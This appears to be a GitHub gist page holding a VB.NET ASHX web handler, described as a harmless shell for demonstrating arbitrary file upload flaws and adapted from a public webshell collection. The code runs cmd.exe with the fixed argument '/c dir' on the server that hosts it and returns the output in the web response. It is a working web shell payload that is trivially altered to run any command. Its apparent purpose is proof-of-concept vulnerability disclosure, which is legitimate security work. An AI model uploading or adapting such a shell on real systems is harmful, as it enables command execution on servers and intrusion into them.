Created
March 10, 2026 12:12
-
-
Save honoki/f332977f67a3967878d630cbbd659014 to your computer and use it in GitHub Desktop.
A harmless ASHX shell to demonstrate the impact of arbitrary file upload.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ WebHandler Language="VB" Class="Handler" %> | |
| ' sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx | |
| Imports System | |
| Imports System.IO | |
| Imports System.Diagnostics | |
| Imports System.Web | |
| Public Class Handler : Implements IHttpHandler | |
| Public Sub ProcessRequest(context As HttpContext) Implements IHttpHandler.ProcessRequest | |
| context.Response.ContentType = "text/html" | |
| context.Response.Write("Executing code.") | |
| Dim myProcess As New Process() | |
| Dim myProcessStartInfo As New ProcessStartInfo("c:\windows\system32\cmd.exe") | |
| myProcessStartInfo.UseShellExecute = False | |
| myProcessStartInfo.RedirectStandardOutput = True | |
| myProcess.StartInfo = myProcessStartInfo | |
| myProcessStartInfo.Arguments = "/c dir" | |
| myProcess.Start() | |
| Dim myStreamReader As StreamReader = myProcess.StandardOutput | |
| Dim myString As String = myStreamReader.ReadToEnd() | |
| myProcess.Close() | |
| context.Response.Write("<pre>" & myString & "</pre>") | |
| End Sub | |
| Public ReadOnly Property IsReusable() As Boolean Implements IHttpHandler.IsReusable | |
| Get | |
| Return False | |
| End Get | |
| End Property | |
| End Class |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment